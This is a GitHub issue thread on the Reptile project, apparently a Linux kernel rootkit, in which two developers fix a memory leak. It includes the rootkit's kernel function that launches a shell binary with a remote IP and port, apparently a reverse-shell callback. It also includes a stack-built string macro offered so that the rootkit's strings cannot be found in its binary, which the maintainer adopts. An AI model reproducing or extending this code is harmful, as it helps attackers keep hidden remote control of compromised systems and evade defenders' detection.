### ISSUE TITLE
Memory leak

### ISSUE THREAD

**Issue by milabs** [f0rb1dd3n/Reptile#21]
~~~
void shell_execer(struct work_struct *work) {
    	struct shell_task *task = (struct shell_task *)work;
    	char *argv[] = { task->path, "-t", task->ip, "-p", task->port, NULL };

    	exec(argv);
    	if(task) {
		bzero(task->path, strlen(task->path));	 <<-- task->path leak
		bzero(task->ip, strlen(task->ip));       <<-- task->{ip,port} leak
		bzero(task->port, strlen(task->port));	
		kfree(task);
	}
}
~~~

**Comment by f0rb1dd3n** [comment]
@milabs, 

Thanks for reporting that. You got the point, and I will fix it. But I think I have to consider obfuscation in general. Since Reptile doesn't have any obfuscation, just prevent these leaks will not work.

I think there is another leakages like that and some weakness on my code. What do you think about it?

**Comment by milabs** [comment]
What's common in obfuscation and programming bugs?

**Comment by f0rb1dd3n** [comment]
if I want to prevent memory leaks, I have to obfuscate strings first too, cause someone can retrieve information just searching for strings in binary.

**Comment by milabs** [comment]
~~~
// echo -ne 'helloworld\n' | hexdump -ve '"%08x\n"'
#define STR$helloworld \
({ \
 unsigned int *p = (unsigned int *)__builtin_alloca( 3 * 4 ); \
 p[0] = 0x6c6c6568; \
 p[1] = 0x726f776f; \
 p[2] = 0x000a646c; \
 (char *)p; \
})
...
printf(STR$helloworld);
~~~

Catch the idea and don't forget to add credits on me.

**Comment by f0rb1dd3n** [comment]
@milabs,

take a look in this commit [ed2ce1d](https://github.com/f0rb1dd3n/Reptile/commit/ed2ce1d1edb289b6edfbb671dce5699c80cdfd37). Can you tell if I am doing it right?

thx

**Comment by f0rb1dd3n** [comment]
fixed in [ed2ce1d](https://github.com/f0rb1dd3n/Reptile/commit/ed2ce1d1edb289b6edfbb671dce5699c80cdfd37)
